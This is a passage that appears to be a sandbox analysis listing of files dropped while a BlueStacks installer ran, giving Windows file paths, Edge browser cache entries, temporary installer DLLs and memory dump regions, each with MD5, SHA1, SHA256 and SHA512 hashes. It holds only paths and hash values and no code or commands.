SHA512 6adc7379a9dd9d61cc40ce3e69eb6a6fb413f3f3e5b153ae5270aba31802fa28e9206e52063c4a6c9e7b283478374123e919c9b9a9200638f80d780bc944ae94

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\af2cfcaf6d9b18bc_0

MD5 a5d9d1057ce2af1e30d4d141e45a9eb4
SHA1 001f5086f40f37da150debdfed2d83c5739ebd41
SHA256 0d00386028fc5fac9b0ac75dd8b498be70318dc0a771284e8fbf9bd9c382ec3d
SHA512 90e6e273b62920faeec00d7b6a43b228cf8889f0095e251c7601139426d614c2dc0693a0bb5b338e150416d529132bf84dd39daac0a54bde10df2a75b5e7497d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\daea348421cbc209_0

MD5 da7c680c38a277d819c5eb4a2ba63eed
SHA1 f47ffd83d99f0c2512df0afa41a84e58e9067633
SHA256 fb3a2c99f927b601ecde41056362093440ca8071ae93079d1d7706325d1d9213
SHA512 c16cb969eaaab7d896f934227b885e3e6e80a648e8142d27dab4dc3a5746eaf4eca01e5d5f0e8c7c7b66539a13d01acf8e54acedcda3572e84f2538d1cf3b6fe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\26b36554bf52f1a8_0

MD5 5acf987616ae84c57a0e08a23937d965
SHA1 e4d84389b5eb4828ce3430feb2138f2f73abaf2b
SHA256 79a01b17d3a367af426c1d3ea09adb4e999fd4d698ae37368f1d225bc253c81a
SHA512 d083f87e9807f215db6f3729d0f6e3807dd90b874e856ace2c8e367baff3253487ac3672295db7bf9227ad87912c86da6363e883cdff647476d3378480dbe876

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 3a4053039aaca36155a075327d56c975
SHA1 f3bd1636d27a2ffd0b6f366e22ea2c0cf9ddbd39
SHA256 f3b97a74f4f3e85b7944315fd981d46dee4b497b55f2a6e85faecd30f8432c11
SHA512 dcc1753e2b137bdf75dc07d9a918f2e6b85937366968c8f84efbdd9ca5b137c7bcb04b2174e225f56c32552f7feac7a34f2c2802b4934f69dee9391908486a27

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1d6ddb511344e7ee34dbbcc15a47c323
SHA1 1e57f727db9a75103846a404181798889005a97e
SHA256 8497edd9dcd4e902fcf18f3faf44da4e37660b2baa693e563092255a8e95b75d
SHA512 a3af662a263d41ed15bc97d2ac51b2ba6f29aa38d16bf21b3b52cf7466314538f671ea93a70a5f1dccafb000c7b4737e082e6e9093c759fde87bbf8ac2c04646

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 1f9f2510025de93c8f9748fbf8bb5a2c
SHA1 52661cf33a299b137feb4323d188688b280fab6a
SHA256 e89825019be623f4f9a25ddb0fc5f032ec3bca551102b725715e6ff1ce3b4cb9
SHA512 7fbf86f0235406af561bcf822d137cec81f6b40a6cf1908f46a99848a4065b90cd63bec02aefedc33f609bf8dbd702d92af2fa5b98aff1fb0aa3e3a451232e43

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d7bc3d4a95a958b424b46db344eb3bbf
SHA1 9e263d626f79906a20a89d8596a8b9804721071e
SHA256 540b56eb86c0993d161ff6211ddd19f87c42243fcb258c6f3ccbf90263c315d5
SHA512 75f66beb649f6c9dd417a3538bc81018ea0612e8cd67a0c3afcc500919997060dde27e7baa76bbe1e3baca6f846eec70006732c5a5408d64aa1031ec3390d29e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b07f53c03d60c350_0

MD5 f857bc497b99d895e55a33c5a949327c
SHA1 1789f1f239d72091b7f86e6fb1f541c26bb98b48
SHA256 31ceaa4a826d7ce8ce7ed17c7b7326913a726dfe53c702ff2f34b46547cbcfe2
SHA512 3568d2dc4c481153176326f7a58ed6f6260ef2787f8d2e8909c788faedd46a537158cfccbaadf7b0c551fa15ea8dc571e41839d77d2c339f3c2b7e54563759a1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fe54f6337f304ca7_0

MD5 d65db12a06f5b7a5126f880c3e375696
SHA1 b1b7cf4a993bf4058f20ffae1f9495ac4ed91c63
SHA256 65e154f14de6e472d0d5e1125c633be4c1699de5200add816e0ab8b53d5c2a7e
SHA512 7dfbdc344fb6a401e89af73f0aa183788d7279c6f76ae8a0f9bb7b7f0cc836fe5fe2292bd450d7383736bd7095a636be480735a5656d0c9904f7a283a9be862a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 aeb4c402d585f6f93af6f8a7c390c93e
SHA1 f6ec26304370aff8c729dc37186192130ded974a
SHA256 ddda8bfea31305e54869345eb8b4aa2972eb69415be4b5b41917786b6971646c
SHA512 716f980873a4b07b2646596fd19de7a87e1a0692f02f690ed7b404c40766bc0224ad4f409194cf0015f3bd20548adc371543c330fe5f5a7bc2a6bf12b75fdb4a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8a7e9fb17dfff003_0

MD5 1b0f6911094e41bf53dedae14c4619c9
SHA1 332b8a670bb5403169b6cdd1b982e84f216cc9ff
SHA256 d044dd43e23076c616f7df4a44ac413cdce7bce6354cd33577a5223550167aa0
SHA512 ac3f3ade30c8ddc414aafd4e3104494d88f2c136530af68bd7226413448694cfbf08cd8f9c8bfb9127d9e1f6ae328bc7c4ca4197e0bfbb934d65c5d840d238e8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 93c7b975b6bf175b5ec0fec271189ace
SHA1 65310eb28da938594c11ef70b227bec414a5d9db
SHA256 1884190bf2578a35a98e8c76e9b0a25549e0d6ae203fb431a34951f22c71f51e
SHA512 847023d8132df2f3a9f9f1368c0ee255a83fc04e3f3dcd9e209ac591d08bf9c3f0b72c82b5b9758b587c6832f174d71456ec34e0622b18e8eb4a6146bd814959

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c1dbda5a93083742311652df5948b564
SHA1 8efe4721b86ecda703600f616bfcf1ecf99b216e
SHA256 c0a1cd9ff7932b2ae21e270bff360d2ada2de6526d796bf6bb6967f4fab8cc59
SHA512 e99acf13c18711aec6a484fd790f89fb47f553e9bf2ab588a594205a0ebd4a39a7f5224870ddf0f60a75f41168d82e48c64b634baad978e68c8ee0f42a06ea08

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 add58757030a65a01a235ef01b079ee9
SHA1 f3487b52a75096018266d2cf5ca3c27b420419ea
SHA256 6e2ef28a3871d11670b50140c746ca03f8003b15bfcd6ee23575ec48ee9aa828
SHA512 143a216ab8aec2e79d3ffe2c877c7277bc3651de403c36af62f5ed38052187229c23c50f57e11315026c3d116ad704ceac7ddf4082c99a457de5fd559da2ef8c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 e6716627a14ced6f460b5b1fb347699c
SHA1 0357b1a2dbc81b6a820e9df26fb0e6c743372b72
SHA256 354eb04cd40a47a1f41307122cb8b51ad08822f1a8f7f957b6a3638f7e61d8f3
SHA512 1ee3362e281a277c74203cd02e594d928bc95afa76f41f0fb18530e14a4866f64a48fbb65edc61d53abd284e6c71905b47470055d0e23dcfd4917e630373453e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00013d

MD5 015c126a3520c9a8f6a27979d0266e96
SHA1 2acf956561d44434a6d84204670cf849d3215d5f
SHA256 3c4d6a1421c7ddb7e404521fe8c4cd5be5af446d7689cd880be26612eaad3cfa
SHA512 02a20f2788bb1c3b2c7d3142c664cdec306b6ba5366e57e33c008edb3eb78638b98dc03cdf932a9dc440ded7827956f99117e7a3a4d55acadd29b006032d9c5c

C:\Users\Admin\Downloads\Unconfirmed 346579.crdownload

MD5 4611f5bcd1dce6d2d0e0bfafdbc70c84
SHA1 5f22f6540e4ce5f2c6e5b9bb1d2f1af8f5779128
SHA256 71c0651f04787a0b9d1c997b5026cc388f798e608c6049d44daea58669a3eba2
SHA512 a62165ae66a6e21da73da7a31285a1f901495c192be729ec249b278cd6b3093107f4ea315ea82d572d72755e30b77b8ce87a515e14a57fc22a4c86466bddffd3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 185da8a433d5fdc82451e4b83bca5852
SHA1 7003fa2e0f00b3586a741d336fe846c86685f4b0
SHA256 239b0fee5546c9f826ab715f635fa2e67a2eeaaa942d2db94e74f03e4b0c45cd
SHA512 199787b804feb21fa63982b68de937b5dc7ec8debcf2114108b186b54e6ac291e7d9bdb5ce0182dd948cfac9847fb1d937848dc3acbd12d3be6e676e9659ed1e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8278407fac0b76d825b3ca3a9af9c88c
SHA1 de9070be5bd098586bb76f6443019518170e6c9d
SHA256 71ea5a861b88f81042e57c6739353d6e3b07cc1dce29bffb53c77907b136e967
SHA512 1ba1f54e60014736e88d97305a9a4c6b7a9e50da5ce90c0e379ff1c5eb31ac7b0a146cd986c49aef853b11a16ee818fc5027967c5a7a3954d1f2fb1a1399ed83

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 3e3f054468437ca495fdf7e057f2f560
SHA1 8f94f3919fc7f42760391db5b4d9ca20eb88ae52
SHA256 20bc77601031a3a2f81060bfe2c53199174d9cfde70c2cae3caaca809d39f667
SHA512 eb362f87547edb9f5c0efc11d445ee4f27f5d7e9ae0e88ec4f277b4d2519d536ce4b53ac6f04b69b68e59f1744e85f6762db8a8da6977c7abf7032bc5e17f118

C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe

MD5 1744edd4e585a5efbd49ad0593810af1
SHA1 57dbda1bac0b48803933da6940c3b88376774c69
SHA256 3b136c884fb6e21acfcca33538f9b2e472f0eb83ae9a5a128cb1d5a6098b7f31
SHA512 f7690f5cbb08f2b7f801aecb24c826dee1fc08cd9d324b54359ab258be92577e72dcbab146bc4f55ab58dee0a01ff32070ef0f4a58385ba928f3f01bfe15d018

memory/6132-7145-0x0000000000240000-0x00000000002DA000-memory.dmp

memory/6132-7146-0x000000001AF10000-0x000000001AF78000-memory.dmp

memory/6132-7151-0x000000001C500000-0x000000001CA28000-memory.dmp

memory/6132-7152-0x000000001BAD0000-0x000000001BB08000-memory.dmp

memory/6132-7153-0x000000001BAA0000-0x000000001BAAE000-memory.dmp

memory/6132-7154-0x000000001FFA0000-0x000000001FFA8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a39f3f550f5a54ab4f8d99835fac52b7
SHA1 8b49db0b026b24c5c417c337776a216bb3c870d0
SHA256 8e9e182ea58b58846c3292d44074d3ddbfb227635ffc981c2dc91a0a779d28d4
SHA512 c7fc1bdab066940871657e47c8e31b8b6c9670e9d812ad596d60cc4b7f11f3429cdfad324cc013e9972019604126daabf02e932dcc9dd1561b2b91e44dbee9d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c73eb93304dbdfa296b1f3dee7cd5d7e
SHA1 489b335d87c626663f5dd566b0848f426b71219c
SHA256 e68430bdb6f04996e1732548738c08f8562c104a0fbb7daef3e0fd8abf000140
SHA512 0b6f04de1c16e1383675dfef84dc8a636f4e9224c2ddde11e6a69d7f914d08cafe899b3d0bc892481ebf9e77f31e62ead91fc87e87f71508bc6094c259258f6c

C:\Users\Admin\AppData\Local\Temp\nsr88F8.tmp\nsDui.dll

MD5 c40a4e327c43f7f51a20c38b1bae840f
SHA1 0f56fe0a357a71ef32cb138258366f743f8fc398
SHA256 ef94f69593fd376e52a46934629b634a6365590b7102cd45a2dfe45533139060
SHA512 f379dc79899744160f21d6c8f11341b2251e58c09dd510b035cf08ce8bfcd38e290b96af3baa656ec85be8753dca7e32d3b95098ced1cfb481142d454b178565

C:\Users\Admin\AppData\Local\Temp\nsr88F8.tmp\BgWorker.dll

MD5 36c81676ada53ceb99e06693108d8cce
SHA1 d31fa4aebd584238b3edc4768dd5414494610889
SHA256 a9e4f7ec65670d2ce375ffaf09b6d07f4cd531132ca002452287a4d540154a38
SHA512 1300de7b3e1ac9e706e0aad0b70e3e2a21db8c860e05b314a52e63dd66b5dffdf6be1e38ab6ede13bfd3a64631cc909486bf4b1403e7d821e3b566edc514c63c

C:\Users\Admin\AppData\Local\Temp\nsr88F8.tmp\System.dll

MD5 959ea64598b9a3e494c00e8fa793be7e
SHA1 40f284a3b92c2f04b1038def79579d4b3d066ee0
SHA256 03cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b
SHA512 5e765e090f712beffce40c5264674f430b08719940d66e3a4d4a516fd4ade859f7853f614d9d6bbb602780de54e11110d66dbb0f9ca20ef6096ede531f9f6d64

F:\BlueStacks X\image\LocalAPK\close_normal.svg

MD5 3221ac69d7facd8aa90ffa15aea991b0
SHA1 e0571f30f4708ec78addc726a743679ca0f05e45
SHA256 92aeae68e9e0973d9e0dc575941f1cb2e24afd0574341a46b870be7384eaa537
SHA512 5e2de0abfe60a4db16ea5e8739260c19962fbfc60869a77bde6ab3547ad8ee3ad88e74e97da31fa23be096afddad018e431d152d6d0fa21a75357a11dacb1328

F:\BlueStacks X\image\LocalAPK\close_hover.svg

MD5 76166804e6ce35e8a0c92917b8abc071
SHA1 8bd38726a11a9633ac937b9c6f205ce5d36348b0
SHA256 1bca2e912184b8168ee8961de68d1d839f4f9827fde6f48ab100fb61e82eff90
SHA512 93c4f1af7e9f89091a207ab308e05ddd4c92406c039f7465d3b8aca7e0cc7a6c922a22e1eee2f5c88db5e89016ef69294b2a0905d7d6a90fd32835bc11929005

F:\BlueStacks X\image\LocalAPK\close_disabled.svg

MD5 e7fdf6a9c8cae1fc1108dc5a803a1905
SHA1 2853f9ff5e63685ebb1449dcf693176b17e4ab60
SHA256 8ee5aa84139b2ea5549f7272523aeb203d73954c5ccdcf6f7407bf1a3469f13e
SHA512 a6388b24926934e20ccf7fcab41bd219dc6c0053428481d7f466bf89f26bf1a36fdff716a9ddd9ab268df73b04dff1449c6bac1f5c707e31ae2ee71c2087e0d9

F:\BlueStacks X\image\LocalAPK\close_pressed.svg

MD5 dfddf8d0788988c3e48fcbfb2a76cd20
SHA1 463bb61f0012289e860c32f1885a3a8f57467f2e
SHA256 9585f41eb6202e89f2087266fa31852d7f41ca8cc659b907c96753fe165f937d
SHA512 e708c5114c60f7574589d6a56c9faedda26ee4a40f0eeb25f5e12eadcf790f24fdbf393fa0aa6ad449b5337d625b092d6f8822472fa8a6ce1339aca59c50c3ca

F:\BlueStacks X\BlueStacks X.exe

MD5 62e4a0fff6c786b95c6ef4808e3e64b8
SHA1 da5be7cf6a5858c8afdffd716c966b561cb17942
SHA256 217a85a670f12953bd4039ab0b89180b46e32b3ebe820877cf587e6bfcef0bbd
SHA512 19e72fbba7ae7aaafbef30658d3e66ccb6200a56dd6ffaeee1d476ddc1d8ea71ea01da2804e98605e819367b53681747f6129d1be332248c49134b909d1ae2ed

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000039

MD5 e8e1f8273c10625d8b5e1541f8cab8fd
SHA1 18d7a3b3362fc592407e5b174a8fb60a128ce544
SHA256 45870d39eb491375c12251d35194e916ace795b1a67e02841e1bbcb14f1a0e44
SHA512 ca77d40ec247d16bc50302f8b13c79b37ab1fcf81c1f8ab50f2fc5430d4fabc74f5845c781bd11bb55840184e6765c2f18b28af72e1f7800fe0bb0b1f3f23b24

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000152

MD5 80f5ef733ad7c6422845d5b5f9772bee
SHA1 5139943cda266c32f59f2c04876f8cfde68ee48c
SHA256 40777a24fb7798b7d297ba926e7dc1946895bfcba4665392230e4bcabbff5c16
SHA512 b8b7f86dd5aa8ec582105ee8737610969cdf4d3efb233c8bd9ab85b695f26ae3422d298d5e2076d2fb0317ab0bbd9cb8f839a6c33de2e14b40570b81167c1301

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f50b4d58e848d1dd_0

MD5 006f9807c61426b39c9bbcc1896eb43c
SHA1 0b50f6c7d759bc8a42d3b3b200dc3fd90e0b30a8
SHA256 a793563fb8774fa37407aa70e9405a214c90d9c0952d7ddb24b8b45c64d6e9fe
SHA512 49bbba47a24f9c165196e563a56dfa86de509a48a927da33e8fc83acf4b201397d34e8967d4f49ebcd2714dc028b9b7b7e8844697227690c4c03c8a1190d44c8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\26030e62953647cf_0

MD5 dbe48dc5640a47605386a0a3a98fad28
SHA1 d3e36a20059bb1521a3fe9d6325aba277db08628
SHA256 575a84075e79699d7b4e0433e4bf498900f6f70fadcbb35dabbfb9c0fd45b3dc
SHA512 8618e72a8d6bae68568de9e387c070dba224c67142c285838ea9a01a7df87a47feeb2f0e4c1f923b1d22427095a706fa63b4ba19c6723c30ffe3ac818c8424d3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\df53bad28ea1e322_0

MD5 9865789a8b31b36e53677e5dcac3506f
SHA1 ead16a60c1b8b5362fdf6cdcd2fb9ea029e52e2b
SHA256 8e2ca5276d9a0999a5c5f1b8bc2fc98dfac78f2ce817e31ce743d88699441853
SHA512 2271edaba5a09edafbda48c4721132617bd496d60ad615d227e38c7390f1111e7e3347b999ce6332fad4af82096941dce9a6d4184497067973468f712d437403

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Assets\exit_close.png

MD5 26eb04b9e0105a7b121ea9c6601bbf2a
SHA1 efc08370d90c8173df8d8c4b122d2bb64c07ccd8
SHA256 7aaef329ba9fa052791d1a09f127551289641ea743baba171de55faa30ec1157
SHA512 9df3c723314d11a6b4ce0577eb61488061f2f96a9746a944eb6a4ee8c0c4d29131231a1b20988ef5454b79f9475b43d62c710839ecc0a9c98324f977cab6db68

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Assets\minimize_progress.png

MD5 1504b80f2a6f2d3fefc305da54a2a6c2
SHA1 432a9d89ebc2f693836d3c2f0743ea5d2077848d
SHA256 2f62d4e8c643051093f907058dddc78cc525147d9c4f4a0d78b4d0e5c90979f6
SHA512 675db04baf3199c8d94af30a1f1c252830a56a90f633c3a72aa9841738b04242902a5e7c56dd792626338e8b7eabc1f359514bb3a2e62bc36c16919e196cfd94

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Bootstrapper.exe

MD5 84374e0d11c463624448d139f6c17dac
SHA1 2db5057242c766bf53748a9d23b9e0b18e699d1e
SHA256 218cf6acbc7a1a4b9fef00b8dc9660f2452099fbd0a6a459d364e61017cbae59
SHA512 4b258f34250d2374a941a4902ee4b2d9454a8cd9f1b27772a7729f2f72607b4fca28e932d0aa2d36cad527f5b1166e6e32ea087da9df4506ea05c64148fa8d7b

memory/432-20032-0x0000000000190000-0x00000000001B8000-memory.dmp

memory/432-20033-0x0000000002390000-0x0000000002474000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bde00f0bf11f31da1deadd0d6245afee
SHA1 6d4abcc89f33575235c1adc833f59ec486b44e0d
SHA256 5c3c46b8ac3edc113686e0bd3ec0c0c7c70b5a84b50e6673f0392db958e7eb14
SHA512 57dfe18532705ce93b5ef8711124192af1c7c0edc38063d49649670124a7bf84b1cb461fc546af5b8e74a8fa6e201ce58a8a8b7e1e7def9da7a6debbfd481191

memory/688-20047-0x0000000000710000-0x0000000000764000-memory.dmp

memory/688-20057-0x0000000020DF0000-0x0000000020E70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe

MD5 81234fd9895897b8d1f5e6772a1b38d0
SHA1 80b2fec4a85ed90c4db2f09b63bd8f37038db0d3
SHA256 2e14887f3432b4a313442247fc669f891dbdad7ef1a2d371466a2afa88074a4c
SHA512 4c924d6524dc2c7d834bfc1a0d98b21753a7bf1e94b1c2c6650f755e6f265512d3a963bc7bc745351f79f547add57c37e29ba9270707edbf62b60df3a541bc16

C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 222d984f390d45cc9ac1a63c90cdfbc5
SHA1 9c0bbaaaade0d410fe639f7e7394584f9cea60ed
SHA256 fcc0150cd2db8e6ad6233544d7323ee5fd7b7cccc990efcdd5ffbb400b76e1ca
SHA512 6d84b83151f4a950eb5133392ffa79e5095c4c54c30618ef25d113528c333553de1c8bdf897c86faad3363320631282e0d16326f66c72f50da777c63aeee13bd

C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\WinShell.dll

MD5 1cc7c37b7e0c8cd8bf04b6cc283e1e56
SHA1 0b9519763be6625bd5abce175dcc59c96d100d4c
SHA256 9be85b986ea66a6997dde658abe82b3147ed2a1a3dcb784bb5176f41d22815a6
SHA512 7acf7f8e68aa6066b59ca9f2ae2e67997e6b347bc08eb788d2a119b3295c844b5b9606757168e8d2fbd61c2cda367bf80e9e48c9a52c28d5a7a00464bfd2048f

C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\Registry.dll

MD5 2b7007ed0262ca02ef69d8990815cbeb
SHA1 2eabe4f755213666dbbbde024a5235ddde02b47f
SHA256 0b25b20f26de5d5bd795f934c70447112b4981343fcb2dfab3374a4018d28c2d
SHA512 aa75ee59ca0b8530eb7298b74e5f334ae9d14129f603b285a3170b82103cfdcc175af8185317e6207142517769e69a24b34fcdf0f58ed50a4960cbe8c22a0aca

C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\nsExec.dll

MD5 ec0504e6b8a11d5aad43b296beeb84b2
SHA1 91b5ce085130c8c7194d66b2439ec9e1c206497c
SHA256 5d9ceb1ce5f35aea5f9e5a0c0edeeec04dfefe0c77890c80c70e98209b58b962
SHA512 3f918f1b47e8a919cbe51eb17dc30acc8cfc18e743a1bae5b787d0db7d26038dc1210be98bf5ba3be8d6ed896dbbd7ac3d13e66454a98b2a38c7e69dad30bb57

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000158

MD5 26de8b45afc27729849be0c409b79c03
SHA1 0a10733bf2193837092d47f10ff04d7fa9705cee
SHA256 0804c255c1bac2280f20b920b5a218a058e55670b385c51452d6ed80e1766df5
SHA512 19e620d557e8aaeb27ba5d600c45c40f5981a3eb5ab71464132c4ea68b55d9c2128f3b547a9071bd99d8b38ec46057ceda8642296c77a601d5e6250e25e7e28d

C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json

MD5 831eb29211092b027443788e3859583e
SHA1 f6982977a6b4fd4e8aa6aa6cab6f07f93fe62619
SHA256 9726dd6ce243ddcae4e1deeee229f737869c7df81a96d08e00d9afb58f2edbd4
SHA512 6ffc8940382294da299d0894acfbcc0cc500e4b128fb1ac35e5c24a8eb3d51a5004b18e23c4b6eb448bebc02e76ee84d0d22f5db5ea97e87a2a586e6175bbad5

C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json.tmp-97184161126ea3d9

MD5 cc7a2ceb041cafc050187371a01f1908
SHA1 b481dfb546b95dd8b2a686f0784634a142a8c3ac
SHA256 1765d8dba844548bbddab2bf8b61719250c1788e28505601e17fab8ccee8480b
SHA512 2c77bff793ae3de973435f5cb510f7b3885722cdaf6f6f1f3b6dc215f7e620780c526a94bb819930fbb36047a18bf73823a901da0e1f1b4f2ceb9f90a2296d97

C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json.tmp-97184162739f56f7

MD5 a0eff9e215e0b936bd1fb149052a3e64
SHA1 81106b523ea55bb3c243eb8fd54299e97aadb3a9
SHA256 8b5285c8ff508fba3727b2a09de38e69ce4d85c9e5d5fa82670a096ca1f26601
SHA512 692fb62f04665a93334f29d2c2b13fc3ec02ab2046134b5239445af274c1dff0c9602b80d4942d734b844f28e23ffc4eb3481b7ebc64027fa82e99149d4f6d61

C:\Program Files\BlueStacks_nxt\7zr.exe

MD5 fbaba140f30a11e5ff4f97d921de6d45
SHA1 d12360b79d9fe7ddc5380a22539dc7d4768ff5f3
SHA256 4889c0826c633c0291264d37834363be90ee39d07fcea228494ed151386dcb16
SHA512 cd18bb1b057b1b077fde372ca5f98701614b196b692ac42ec56e5b839535022d884a2cd9b6bf644a520c6f48f12f673574a24e60580c70c695067b66442ea7a5

C:\Program Files\BlueStacks_nxt\Assets\close_red_hover.png

MD5 5ceab43aa527bc146f9453a1586ddf03
SHA1 88ffb3cadccb54d4be3aabf31cf4d64210b5f553
SHA256 7c625ae4668cc03e37e4ffc478b87eace06b49b77e71e3209f431c23d98acdd0
SHA512 8a5c81c048fb7d02b246ed23a098ae5f95cdf6f4ca58fd3d30e4fe3001c933444310ca6391096cfaeed86b13f568236f84df4ea9a3d205c0677e31025616f19e

C:\Program Files\BlueStacks_nxt\Assets\installer_bg.jpg

MD5 3478e24ba1dd52c80a0ff0d43828b6b5
SHA1 b5b13bbf3fb645efb81d3562296599e76a2abac0
SHA256 4c7471c986e16de0cd451be27d4b3171e595fe2916b4b3bf7ca52df6ec368904
SHA512 5c8c9cc76d6dbc7ce482d0d1b6c2f3d48a7a510cd9ed01c191328763e1bccb56daeb3d18c33a9b10ac7c9780127007aa13799fa82d838de27fbe0a02ad98119d

C:\Program Files\BlueStacks_nxt\Assets\close_red_click.png

MD5 6db7460b73a6641c7621d0a6203a0a90
SHA1 d39b488b96f3e5b5fe93ee3eecb6d28bb5b03cf3
SHA256 d5a7e6fc5e92e0b29a4f65625030447f3379b4e3ac4bed051a0646a7932ce0cd
SHA512 a0e6911853f51d73605e8f1a61442391fad25ff7b50a3f84d140d510fd98e262c971f130fb8a237a63704b8162c24b8440a5f235f51a5c343389f64e67c1c852

C:\Program Files\BlueStacks_nxt\BlueStacksUninstaller.exe.config

MD5 ca0a329097316832e4a6ea5d870c9268
SHA1 4a36b93361d3dc9df9b00313f2c2b394be9e1e72
SHA256 4b7df915d706af6459c38d75b09c5e14f951842ae0678078400f204ad1c7a7c2
SHA512 51f9a874e84f130be4fa29fcc4bc934105318234b5dd9ceedaf569e3f0e6b38e29f3bec056044724476ae24295a510b16d8a737b994fd6f1268609defa315271

C:\Program Files\BlueStacks_nxt\Assets\unchecked_gray_hover.png

MD5 62d7f14c26608f8392537d68f43dece1
SHA1 add4f30e7c3af4f7622e6bc55d960db612f3bb0a
SHA256 a631e26bd5b6ea19c8c65b766a056c92ba8a47e1483768dcf12b05293c9a7a0d
SHA512 e41210a78e6076954f75a2f73c0f7628e8604a09ecbb1d2ee0972741d4ef1d814b366828977c02944736b03ed116bc559a2ae47ddb7cbc6f4e54578c8263edf4

C:\Program Files\BlueStacks_nxt\Assets\unchecked_gray.png

MD5 e50df2a0768f7fc4c3fe8d784564fea3
SHA1 d1fc4db50fe8e534019eb7ce70a61fd4c954621a
SHA256 671f26795b12008fbea1943143f660095f3dca5d925f67d765e2352fd7ee2396
SHA512 c87a8308a73b17cbdd179737631fb1ba7fdaeb65e82263f6617727519b70a81266bb695867b9e599c1306ee2cf0de525452f77ce367ca89bf870ea3ae7189998

C:\Program Files\BlueStacks_nxt\Assets\powered_by_bs.png

MD5 7a2e5c21140aa8269c2aafd207f5dbaa
SHA1 4e0d9e7e1b09e67eba10100d73dc51623517821e
SHA256 3d2afe5236ec813d9e8063bc43eb34b88c2155784e1bce19c6a533c32767af35
